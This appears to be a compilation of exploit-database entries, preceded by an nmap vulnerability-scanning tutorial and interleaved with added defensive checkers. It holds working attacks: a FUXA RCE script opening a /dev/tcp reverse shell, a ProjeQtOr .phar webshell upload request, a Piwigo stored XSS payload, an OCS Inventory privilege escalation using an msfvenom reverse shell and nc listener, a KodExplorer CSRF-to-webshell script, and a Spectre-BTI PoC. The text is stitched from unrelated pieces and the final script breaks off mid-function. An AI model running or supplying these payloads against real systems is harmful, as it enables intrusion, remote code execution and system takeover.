## Scan with nmap-vulners
Using NSE scripts is simple. All we have to do is add the --script parameter to our Nmap command and tell Nmap which NSE script to use. To use the nmap-vulners script, we use the following command. Replace the #s after -p with the port to scan and the following #s with the IP address of the target.
```
nmap --script nmap-vulners -sV -p### #.### .#### .#####
```
The -sV flag is absolutely necessary. With -sV we tell Nmap to probe the target for version information. If Nmap produces no version information, nmap-vulners has no data with which to query the Vulners database. Always use -sV with these NSE scripts.
```
nmap --script nmap-vulners -sV -p80 1##.##.###.##.#24
```
Here is one example of vulscan in use:
```
nmap --script vulscan --script-args vulscandb=exploitdb.csv -sV -p22 1##.##.###.##.#43
Starting Nmap 7.60 ( https://nmap.org )
Nmap scan report for 1##.##.###.##.#43
Host is up (0.52s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
| vulscan: exploitdb.csv:
|   [2444] OpenSSH=4.3 pl (Duplicated Block) Remote Denital of Service Exploit
|   [21402] OpenSSH s.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
|   [3303] Portable OpenSSH=3.6.1p-PAM/4.1-SUSE Timing Attack Exploit
```
Since the vulscan developers are also VulDB's chief architects, they spend most of their time updating the scipvuldb.csv database file, so querying that database usually yields the best results with the vulscan NSE script.
# Step 5
## Merge into one command
As a security scanner, NSE scripts significantly improve Nmap's versatility, scope and resourcefulness. To make full use of Nmap's version scanning, we can run both nmap-vulners and vulscan in one command:
```
nmap --script nmap-vulners,vulscan --script-args vulscandb=scipvuldb.csv -sV -p### #.### .### .#### .####
```
## Exploit Title: Linux Kernel 6.2 - Userspace Processes To Enable Mitigation
## Exploit Author: nu11secur1ty
## CVE ID: CVE-2023-1998
## Description
## Summary
The Linux kernel allows userspace processes to enable mitigations by
calling prctl with
[PR_SET_SPECULATION_CTRL](https://docs.kernel.org/userspace-api/spec_ctrl.html),
which disables the speculation feature, as well as by using seccomp. We
had noticed that on VMs of at least one major cloud provider, the
kernel still left the victim process exposed to attacks in some cases
even after enabling the Spectre-BTI mitigation with prctl. The same
behaviour can be observed on a bare-metal machine when forcing the
mitigation to IBRS on the boot command line.
This happened because when plain IBRS was enabled (not enhanced IBRS),
the kernel had some logic that determined that
[STIBP](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/single-thread-indirect-branch-predictors.html)
was not needed. The IBRS bit implicitly protects against cross-thread
branch target injection. However, with legacy
[IBRS](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/indirect-branch-restricted-speculation.html),
the IBRS bit was cleared on returning to userspace, due to performance
reasons, which disabled the implicit STIBP and left userspace threads
vulnerable to cross-thread branch target injection against which STIBP
protects.
## Severity
Medium - The kernel failed to protect applications that attempted to
protect against Spectre v2 leaving them open to attack from other
processes running on the same physical core in another hyperthread.
## Vulnerable code
The code in kernel 6.2
(https://elixir.bootlin.com/linux/v6.2/source/arch/x86/kernel/cpu/bugs.c#L1196)
implements an optimization that disables STIBP if the mitigation is
IBRS or eIBRS. However, plain IBRS does not mitigate SMT attacks on
userspace the way eIBRS does. Setting spectre_v2=ibrs in the kernel boot
parameters on a bare-metal machine without eIBRS support also triggers the bug.
```c
/*
 * If no STIBP, IBRS or enhanced IBRS is enabled, or SMT impossible,
 * STIBP is not required.
 */
if (!boot_cpu_has(X86_FEATURE_STIBP) ||
    !smt_possible ||
    spectre_v2_in_ibrs_mode(spectre_v2_enabled))
	return;
```
## Proof of Concept
The test consists of two processes. The attacker constantly poisons an
indirect call to speculatively redirect it to a target address. The
victim process measures the mispredict rate and tries to mitigate the
attack either by calling PRCTL or writing to the MSR directly using a
kernel module that exposes MSR read and write operations to userspace.
```c
/*
gcc -o victim test.c -O0 -masm=intel -w -DVICTIM
gcc -o victim-PRCTL test.c -O0 -masm=intel -w -DVICTIM -DPRCTL
gcc -o victim-nospecctrl test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=0
gcc -o victim-IBRS test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=1
gcc -o victim-STIBP test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=2
gcc -o victim-IBPB test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=0 -DIBPB
gcc -o attacker test.c -O0 -masm=intel -w
*/
#include "utils.h"
#include <stdio.h>
#include <string.h>
#include <sys/prctl.h>

#ifndef PRINT_AMMOUNT
#define PRINT_AMMOUNT 1000
#endif

#define IA32_SPEC_CTRL 72

uint8_t *rdiPtr;
uint8_t unused[0x500];
uint8_t probeArray[0x1000] = {2};
uint8_t unuse2[0x500];

uint32_t f1() {}

int poison(uint8_t *srcAddress, uint8_t *dstAddress, uint64_t cpu)
{
    volatile uint8_t d;
    unsigned tries = 0;
    unsigned hits = 0;
    unsigned totalHits = 0;
    unsigned totalTries = 0;

    jitForLoop(srcAddress);

    while (1)
    {
#ifndef VICTIM
        callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray);
        continue;
#else
#ifdef IBPB
        wrmsr_on_cpu(73, cpu, 1);
#endif
        for (int i = 0; i < 100; i++)
        {
            d = *dstAddress;
            flush((uint8_t *)&rdiPtr);
            callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray);
        }
        if (probe(&probeArray[0]) < THRESHOLD)
        {
            hits++;
            totalHits++;
        }
        totalTries++;
        if (++tries % PRINT_AMMOUNT == 0)
        {
            printf("Rate: %u/%u MSR[72]=%d\n", hits,
                   tries, rdmsr_on_cpu(IA32_SPEC_CTRL, cpu));
#ifdef MSR
            wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL);
#endif
            tries = 0;
            hits = 0;
            if (totalTries >= PRINT_AMMOUNT * 10)
            {
                break;
            }
        }
        usleep(1);
#endif
    }
    /* "%%" prints a literal percent sign; the original "%)" was an invalid conversion */
    printf("Total mispredict rate: %d/%d (%.2f %%)\n", totalHits,
           totalTries, (float)totalHits * 100 / (float)totalTries);
}

int main(int argc, char **argv)
{
    uint64_t srcAddress;
    uint64_t dstAddress;
    uint64_t cpu;

    if (argc < 4)
    {
        printf("Usage: %s <srcAddress> <dstAddress> <cpuCore> \n", argv[0]);
        printf("Example: %s 0x55555554123 0x55555555345 1 \n", argv[0]);
        return 0;
    }
    srcAddress = (uint64_t)strtoull(argv[1], NULL, 16);
    dstAddress = (uint64_t)strtoull(argv[2], NULL, 16);
    cpu = (uint64_t)strtoull(argv[3], NULL, 16);

    SetCoreAffinity(cpu);

    uint8_t *rwx1 = requestMem((uint8_t *)(srcAddress & (~0xfffULL)), 0x1000);
    uint8_t *rwx2 = requestMem((uint8_t *)(dstAddress & (~0xfffULL)), 0x1000);

#ifdef PRCTL
    if (prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH,
              PR_SPEC_FORCE_DISABLE, 0, 0) != 0)
    {
        perror("prctl");
    }
    printf("PRCTL GET value 0x%x\n", prctl(PR_GET_SPECULATION_CTRL,
                                          PR_SPEC_INDIRECT_BRANCH, 0, 0, 0));
#endif

#ifdef MSR
    printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL,
           rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
    wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL);
    printf("writing msr[%d]=%d on core %d \n", IA32_SPEC_CTRL, MSR_VAL, cpu);
    printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL,
           rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
#endif

    // set up leak gadget into position
#ifdef VICTIM
    rdiPtr = (uint8_t *)f1;
    copyLeakGadget(dstAddress);
#else
    rdiPtr = (uint8_t *)dstAddress;
    copyRetGadget(dstAddress);
#endif

    poison(srcAddress, dstAddress, cpu);

#ifdef MSR
    printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL,
           rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
#endif
}
```
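The PoC above measures mispredict rates directly; for a fleet check a defender usually wants to read what the kernel itself reports. The following added example, not part of the advisory, assesses a host for the condition the advisory describes (plain IBRS, SMT active, STIBP not in effect) from the sysfs spectre_v2 line, and decodes the calling task's prctl(PR_GET_SPECULATION_CTRL) state. The prctl constants come from the kernel's uapi headers; the exact wording of the sysfs fields ("Mitigation: IBRS", "STIBP: conditional" and so on) follows arch/x86/kernel/cpu/bugs.c as I know it and is an assumption to confirm against your kernel version; the sample lines are constructed.

```python
import ctypes
import ctypes.util

# prctl(2) constants from include/uapi/linux/prctl.h (see the spec_ctrl
# documentation linked in the advisory above).
PR_GET_SPECULATION_CTRL = 52
PR_SET_SPECULATION_CTRL = 53
PR_SPEC_INDIRECT_BRANCH = 1
PR_SPEC_PRCTL = 1 << 0          # per-task control available
PR_SPEC_ENABLE = 1 << 1         # speculation enabled (mitigation off)
PR_SPEC_DISABLE = 1 << 2        # speculation disabled (mitigation on)
PR_SPEC_FORCE_DISABLE = 1 << 3  # disabled and cannot be re-enabled

SPECTRE_V2_SYSFS = "/sys/devices/system/cpu/vulnerabilities/spectre_v2"
SMT_ACTIVE_SYSFS = "/sys/devices/system/cpu/smt/active"

# Constructed sysfs lines for the states the advisory contrasts. The field
# wording follows arch/x86/kernel/cpu/bugs.c as I know it (assumption): the
# unfixed kernel omits the "STIBP:" field entirely while in plain IBRS mode.
SAMPLE_LINES = {
    "unfixed plain IBRS": "Mitigation: IBRS, IBPB: conditional, RSB filling, PBRSB-eIBRS: Not affected",
    "fixed plain IBRS": "Mitigation: IBRS, IBPB: conditional, STIBP: conditional, RSB filling, PBRSB-eIBRS: Not affected",
    "enhanced IBRS": "Mitigation: Enhanced IBRS, IBPB: conditional, RSB filling, PBRSB-eIBRS: SW sequence",
}


def decode_spec_ctrl(value: int) -> dict:
    """Interpret the bitmask prctl(PR_GET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH) returns."""
    if value < 0:
        raise ValueError("prctl failed")
    if value == 0:  # PR_SPEC_NOT_AFFECTED
        return {"affected": False, "per_task_control": False, "mitigated": True, "forced": False}
    return {
        "affected": True,
        "per_task_control": bool(value & PR_SPEC_PRCTL),
        "mitigated": bool(value & PR_SPEC_DISABLE),
        "forced": bool(value & PR_SPEC_FORCE_DISABLE),
    }


def parse_spectre_v2(line: str) -> dict:
    """Split the comma-separated sysfs spectre_v2 line into its fields."""
    fields = [f.strip() for f in line.strip().split(",")]
    info = {"mitigation": None, "vulnerable": False, "ibpb": None, "stibp": None}
    head = fields[0]
    if head.startswith("Mitigation:"):
        info["mitigation"] = head.split(":", 1)[1].strip()
    elif head.startswith("Vulnerable"):
        info["vulnerable"] = True
    elif head == "Not affected":
        info["mitigation"] = head
    for field in fields[1:]:
        for key in ("ibpb", "stibp"):
            if field.lower().startswith(key + ":"):
                info[key] = field.split(":", 1)[1].strip()
    return info


def assess(spectre_v2_line: str, smt_active: bool) -> str:
    """Verdict for the cross-thread gap in the advisory: plain IBRS, SMT on, no STIBP."""
    info = parse_spectre_v2(spectre_v2_line)
    mit = info["mitigation"] or ""
    if info["vulnerable"]:
        return "vulnerable: no spectre_v2 mitigation active"
    if mit == "Not affected":
        return "not affected"
    if mit.startswith("Enhanced"):
        return "ok: enhanced IBRS covers sibling threads"
    if not smt_active:
        return "ok: SMT inactive, no sibling thread"
    if mit.startswith("IBRS") and info["stibp"] is None:
        return "suspect: plain IBRS with SMT active and no STIBP reported (CVE-2023-1998 pattern)"
    if info["stibp"] in ("conditional", "forced"):
        return f"ok: STIBP {info['stibp']}"
    return f"review: STIBP {info['stibp']}"


def read_live_state() -> dict:
    """Read the running host's sysfs values and this task's prctl state (Linux only)."""
    try:
        with open(SPECTRE_V2_SYSFS) as fh:
            line = fh.read().strip()
        with open(SMT_ACTIVE_SYSFS) as fh:
            smt = fh.read().strip() == "1"
    except OSError as exc:
        return {"error": str(exc)}
    libc = ctypes.CDLL(ctypes.util.find_library("c"), use_errno=True)
    rc = libc.prctl(PR_GET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH, 0, 0, 0)
    prctl_state = decode_spec_ctrl(rc) if rc >= 0 else {"errno": ctypes.get_errno()}
    return {"spectre_v2": line, "smt_active": smt, "prctl": prctl_state, "verdict": assess(line, smt)}


if __name__ == "__main__":
    for label, line in SAMPLE_LINES.items():
        print(f"{label:20} SMT on  -> {assess(line, True)}")
    print("this host ->", read_live_state())
```

On a patched kernel the "STIBP:" field reappears for plain IBRS, which is the cheapest way to confirm the fix landed without running the PoC.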
## Timeline
**Date reported** to Cloud providers: 31/12/2022
**Date reported** to security@kernel.org: 20/02/2022
**Date fixed:** 10/03/2023
- [torvalds/linux@6921ed9](https://github.com/torvalds/linux/commit/6921ed9049bc7457f66c1596c5b78aec0dae4a9d)
- https://kernel.dance/#6921ed9049bc7457f66c1596c5b78aec0dae4a9d
**Date disclosed:** 12/04/2023
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: FUXA V.1.1.13-1186- Unauthenticated Remote Code Execution (RCE)
# Date: 18/04/2023
# Exploit Author: Rodolfo Mariano
# Vendor Homepage: https://github.com/frangoteam/FUXA
# Version: FUXA V.1.1.13-1186 (current)
```python
from argparse import RawTextHelpFormatter
import argparse, sys, threading, requests


def main(rhost, rport, lhost, lport):
    url = "http://"+rhost+":"+rport+"/api/runscript"
    payload = {
        "headers":
        {
            "normalizedNames":{},
            "lazyUpdate": "null"
        },
        "params":{
            "script":{
                "parameters":[
                    {
                        "name":"ok",
                        "type":"tagid",
                        "value":""
                    }
                ],
                "mode":"",
                "id":"",
                "test":"true",
                "name":"ok",
                "outputId":"",
                "code":"require('child_process').exec('/bin/bash -c \"/bin/sh -i >& /dev/tcp/%s/%s 0>&1\"')" % (lhost,lport)
            }
        }
    }
    response = requests.post(url, json=payload)


args = None
parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage="python exploit.py --rhosts <ip> --rport <rport>--lport <port>")
parser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost')
parser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default=1881)
parser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost')
parser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport')
args=parser.parse_args()
main(args.rhost, args.rport, args.lhost, args.lport)
```
Exploit Title: ProjeQtOr Project Management System 10.3.2 -Remote Code Execution (RCE)
Application: ProjeQtOr Project Management System
Version: 10.3.2
Bugs: Remote Code Execution (RCE) (Authenticated) via file upload
Technology: PHP
Vendor URL: https://www.projeqtor.org
Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.3.2.zip/download
Date of found: 19.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
A PHP file with a .phar extension can be uploaded where an image attachment is expected. The code is executed when the uploaded file is requested afterwards.
Payload: <?php echo system("id"); ?>
PoC request:
POST /projeqtor/tool/saveAttachment.php?csrfToken= HTTP/1.1
Host: localhost
Content-Length: 1177
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0bpJaQzcvQberWR
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/projeqtor/view/main.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic
Connection: close
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentFiles[]"; filename="miri.phar"
Content-Type: application/octet-stream
<?php echo system("id"); ?>
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentId"
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentRefType"
User
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentRefId"
1
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentType"
file
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10485760
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentLink"
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentDescription"
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentPrivacy"
1
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="uploadType"
html5
------WebKitFormBoundaryY0bpJaQzcvQberWR--
Then visit: http://localhost/projeqtor/files/attach/attachment_5/miri.phar
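The attachment handler accepts a .phar file as an image and later serves it from inside the web root, where the PHP interpreter picks it up. The following added example, not ProjeQtOr's own code and written in Python rather than PHP, shows the validation a hardened upload path applies before anything touches disk: a deny-by-default extension allowlist, rejection of any server-side extension anywhere in the name (which also catches double extensions), a magic-byte check of the content, and a server-generated storage name. The extension sets and image signatures are my choices for the illustration.

```python
import os
import secrets

# Extensions a web server might hand to a script interpreter; .phar is the one
# the advisory above uses. Any of them, anywhere in the name, is fatal.
SERVER_SIDE_EXTENSIONS = {
    "php", "php3", "php4", "php5", "php7", "php8", "phtml", "pht", "phar",
    "phps", "inc", "cgi", "pl", "py", "sh", "htaccess",
}

# Allowlisted image types and the magic bytes a genuine file must start with.
IMAGE_SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def validate_image_upload(client_filename: str, content: bytes):
    """Decide whether an upload that claims to be an image may be stored.

    Returns (ok, reason, extension). Deny by default: the name must end in
    exactly one allowlisted extension, no server-side extension may appear in
    any position (catches shell.php.png as well as shell.phar), and the bytes
    must match the declared type.
    """
    # Never trust client-supplied directory components.
    name = os.path.basename(client_filename.replace("\\", "/")).strip()
    if not name or name.startswith("."):
        return False, "empty or dot-prefixed filename", None
    pieces = name.lower().split(".")
    if len(pieces) < 2:
        return False, "no extension", None
    extensions = pieces[1:]
    bad = sorted(SERVER_SIDE_EXTENSIONS.intersection(extensions))
    if bad:
        return False, f"server-side extension present: {bad}", None
    ext = extensions[-1]
    if ext not in IMAGE_SIGNATURES:
        return False, f".{ext} is not an allowed image type", None
    if not any(content.startswith(sig) for sig in IMAGE_SIGNATURES[ext]):
        return False, "content does not match the declared image type", None
    return True, "ok", ext


def storage_name(ext: str) -> str:
    """Name to store the file under: a random token plus the verified extension,
    so nothing from the client-supplied name ever reaches the filesystem."""
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed inputs: the advisory's payload file and a minimal genuine PNG header.
    samples = [
        ("miri.phar", b'<?php echo system("id"); ?>'),
        ("shell.php.png", b"\x89PNG\r\n\x1a\n"),
        ("fake.png", b'<?php echo system("id"); ?>'),
        ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ]
    for fname, data in samples:
        ok, reason, ext = validate_image_upload(fname, data)
        target = storage_name(ext) if ok else "-"
        print(f"{fname:16} -> {ok!s:5} {reason:45} {target}")
```

Two deployment measures complement the check: keep the attachment directory outside the document root or serve it with script execution disabled, so a file that slips through is delivered as bytes rather than run.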
Exploit Title: Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)
Application: Piwigo
Version: 13.6.0
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://piwigo.org/
Software Link: https://piwigo.org/get-piwigo
Date of found: 18.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. After uploading an image, enter <img%20src=x%20onerror=alert(4)> as the tag (keyword) while editing the image.
payload: <img%20src=x%20onerror=alert(4)>
POST /piwigo/admin.php?page=photo-9 HTTP/1.1
Host: localhost
Content-Length: 159
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/piwigo/admin.php?page=photo-9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: pwg_id=u7tjlue5o3vj7fbgb0ikodmb9m; phavsz=1394x860x1; pwg_display_thumbnail=display_thumbnail_classic; pwg_tags_per_page=100; phpbb3_ay432_k=; phpbb3_ay432_u=2; phpbb3_ay432_sid=9240ca5fb9f93c8ebc8ff7bd42c380fe
Connection: close
name=Untitled&author=&date_creation=&associate%5B%5D=1&tags%5B%5D=<img%20src=x%20onerror=alert(3)>&description=&level=0&pwg_token=bad904d2c7ec866bfba391bfc130ddd2&submit=Save+settings
#####################################################################
#                                                                   #
#  Exploit Title: OCS Inventory NG 2.3.0.0 - Unquoted Service Path  #
#  Date: 2023/04/21                                                 #
#  Exploit Author: msd0pe                                           #
#  Vendor Homepage: https://oscinventory-ng.org                     #
#  Software Link: https://github.com/OCSInventory-NG/WindowsAgent   #
#  My Github: https://github.com/msd0pe-1                           #
#  Fixed in version 2.3.1.0                                         #
#                                                                   #
#####################################################################
OCS Inventory NG Windows Agent:
Versions below 2.3.1.0 contain an unquoted service path, which allows a local attacker to escalate privileges to SYSTEM.
[1] Find the unquoted service path:
> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
OCS Inventory Service OCS Inventory Service C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe Auto
[2] Get information about the service:
> sc qc "OCS Inventory Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: OCS Inventory Service
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OCS Inventory Service
DEPENDENCIES : RpcSs
: EventLog
: Winmgmt
: Tcpip
SERVICE_START_NAME : LocalSystem
[3] Generate a reverse shell:
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o OCS.exe
[4] Upload the reverse shell to C:\Program Files (x86)\OCS.exe
> put OCS.exe
> ls
drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 .
drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 ..
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Common Files
-rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini
drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer
drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET
drw-rw-rw- 0 Sat Apr 22 04:51:20 2023 OCS Inventory Agent
-rw-rw-rw- 7168 Sat Apr 22 05:20:38 2023 OCS.exe
drw-rw-rw- 0 Sat Apr 22 03:24:58 2023 Windows Defender
drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Mail
drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT
drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell
[5] Start listener
> nc -lvp 4444
[6] Restart the service or reboot the server. Stopping and starting a service normally needs rights a standard user lacks, whereas shutdown /r only needs the shutdown privilege, which interactive users hold on workstations by default:
> sc stop "OCS Inventory Service"
> sc start "OCS Inventory Service"
OR
> shutdown /r
[7] Enjoy !
192.168.1.102: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
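An added helper, my code rather than the advisory's, that parses the sc qc output shown above and lists, in the order CreateProcess probes them, the paths Windows would try before the real binary, then filters them against a caller-supplied set of writable directories. It is written in Python so it runs anywhere offline; the writable-directory list in the __main__ block is a constructed assumption, and on a real host it comes from icacls or accesschk.

```python
import ntpath

# Output of `sc qc "OCS Inventory Service"` as shown above, embedded so this runs offline
SC_QC_OUTPUT = """\
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: OCS Inventory Service
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\\Program Files (x86)\\OCS Inventory Agent\\OcsService.exe
        SERVICE_START_NAME : LocalSystem
"""


def binary_path_from_sc_qc(text):
    """Pull BINARY_PATH_NAME out of `sc qc` output (the value keeps its own colon, e.g. C:\\)."""
    for line in text.splitlines():
        key, sep, value = line.partition(':')
        if sep and key.strip() == 'BINARY_PATH_NAME':
            return value.strip()
    return None


def hijack_candidates(binary_path):
    """
    Paths the Service Control Manager (via CreateProcess) probes, in order, for an
    unquoted path containing spaces: every whitespace-delimited prefix, with .exe
    appended when the prefix has no extension, before the real binary is reached.
    A quoted path is unambiguous and yields no candidates.
    """
    path = binary_path.strip()
    if path.startswith('"'):
        return []
    parts = path.split(' ')
    candidates = []
    for i in range(1, len(parts)):
        prefix = ' '.join(parts[:i])
        if not ntpath.splitext(ntpath.basename(prefix))[1]:
            prefix += '.exe'
        candidates.append(prefix)
    return candidates


def exploitable_candidates(binary_path, writable_dirs):
    """
    Keep only the candidates whose parent directory is in writable_dirs (case-insensitive).
    The first entry returned is the one Windows would start, so it is the one to plant.
    """
    writable = {d.rstrip('\\').lower() for d in writable_dirs}
    return [c for c in hijack_candidates(binary_path)
            if ntpath.dirname(c).rstrip('\\').lower() in writable]


if __name__ == '__main__':
    path = binary_path_from_sc_qc(SC_QC_OUTPUT)
    print('service binary:', path)
    for c in hijack_candidates(path):
        print('  would probe:', c)
    # Constructed assumption: only Program Files (x86) is writable on this host
    print('plant here:', exploitable_candidates(path, [r'C:\Program Files (x86)']))
```

With the advisory's path the probe order is C:\Program.exe, C:\Program Files.exe, C:\Program Files (x86)\OCS.exe, C:\Program Files (x86)\OCS Inventory.exe, which is why step 4 above plants OCS.exe. The same function doubles as a detection check when run over the full wmic listing: any service whose path yields candidates in a user-writable directory is a finding.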
# Exploit Title: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload
# Date: 21/04/2023
# Exploit Author: MrEmpy
# Software Link: https://github.com/kalcaddle/KodExplorer
# Version: <= 4.49
# Tested on: Linux
# CVE ID: CVE-2022-4944
# References:
# * https://vuldb.com/?id.227000
# * https://www.cve.org/CVERecord?id=CVE-2022-4944
# * https://github.com/MrEmpy/CVE-2022-4944
import argparse
import http.server
import socketserver
import os
import threading
import requests
from time import sleep

# Directory served to the victim; shell.php is written here before the listener starts
HTTPDIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'http')
HTTPD_PORT = 8080


def banner():
    # The ASCII-art banner was line-wrapped in this copy; a plain banner keeps the script runnable
    print('''
[KODExplorer <= v4.49 Remote Code Execution]
[Coded by MrEmpy]
''')


def httpd():
    # Serve ./http so the victim's KodExplorer can fetch shell.php from us
    os.chdir(HTTPDIR)
    Handler = http.server.SimpleHTTPRequestHandler
    socketserver.TCPServer.allow_reuse_address = True
    httpd = socketserver.TCPServer(('', HTTPD_PORT), Handler)
    print('[+] HTTP Server started')
    httpd.serve_forever()


def write_shell(content):
    os.makedirs(HTTPDIR, exist_ok=True)
    with open(os.path.join(HTTPDIR, 'shell.php'), 'w') as wshell_f:
        wshell_f.write(content)


def csrf_uri(url, lhost, targetpath):
    # serverDownload fetches a remote URL and stores it under savePath with no CSRF token;
    # this is the link the logged-in victim has to open
    return (f'{url}/index.php?explorer/serverDownload&type=download'
            f'&savePath={targetpath}/data/User/admin/home/'
            f'&url=http://{lhost}:{HTTPD_PORT}/shell.php&uuid=&time=')


def webshell(url, lhost):
    payload = '<pre><?php system($_GET["cmd"])?></pre>'
    targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')
    write_shell(payload)
    print('[*] Opening HTTPd port')
    th = threading.Thread(target=httpd)
    th.start()
    print(f'[+] Send this URI to your target:\n{csrf_uri(url, lhost, targetpath)}')
